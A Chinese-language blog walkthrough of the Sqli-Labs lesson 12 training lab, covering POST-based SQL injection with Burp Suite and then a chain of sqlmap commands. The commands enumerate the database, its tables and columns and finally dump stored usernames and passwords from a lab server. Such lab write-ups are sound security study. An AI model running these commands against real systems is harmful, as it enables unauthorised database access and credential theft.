Sqli-Labs Less12:POST注入
阿新 • • 發佈:2020-01-28
開啟bp抓包
傳送至Repeater,新增 \ 進行測試
根據報錯:222") 猜測查詢語句:
select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)
根據猜測進行注入:
成功登陸。
使用sqlmap進一步測試
複製擷取的資料包在kali中儲存為新檔案 sqli-labs-12
使用以下命令進行測試:
sqlmap -r sqli-labs-12 -p uname
發現無法與伺服器建立連線,在思考後發現,擷取的資料包中主機為 localhost ,而複製進kali後,就應該將 主機修改為 伺服器的 ip :192.168.0.104
再次連線,成功
繼續,奧裡給,幹了!
還是剛才的查詢語句
sqlmap -r sqli-labs-12 -p uname
其中 -r 表示從檔案讀取資料(read)
-p 表示用於注入的引數
檢視掃描結果:
出現了基於報錯的注入,繼續利用該型別的注入,指定注入型別為 error-based ,查詢庫內容
指定注入型別 E (error)
sqlmap -r sqli-labs-12 -p uname --technique E
查詢當前資料庫
sqlmap -r sqli-labs-12 -p uname --technique E --current-db
查詢 security 庫中的表
sqlmap -r sqli-labs-12 -p uname --technique E -D security --tables
查詢 users 中的欄位
qlmap -r sqli-labs-12 -p uname --technique E -D security -T users --columns
查詢欄位內容
sqlmap -r sqli-labs-12 -p uname --technique E -D security -T users -C "username,password" --dump
至此。